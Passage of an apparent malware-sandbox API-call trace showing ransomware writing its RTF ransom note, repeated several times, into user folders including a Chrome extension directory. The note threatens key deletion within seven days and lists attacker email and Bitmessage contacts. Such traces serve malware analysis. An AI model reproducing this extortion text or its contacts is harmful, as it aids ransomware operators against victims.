your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.159] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.159] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.159] CloseHandle (hObject=0x2e8) returned 1 [0292.159] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\#readme_eman#.rtf")) returned 0xffffffff [0292.159] GetLastError () returned 0x2 [0292.159] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 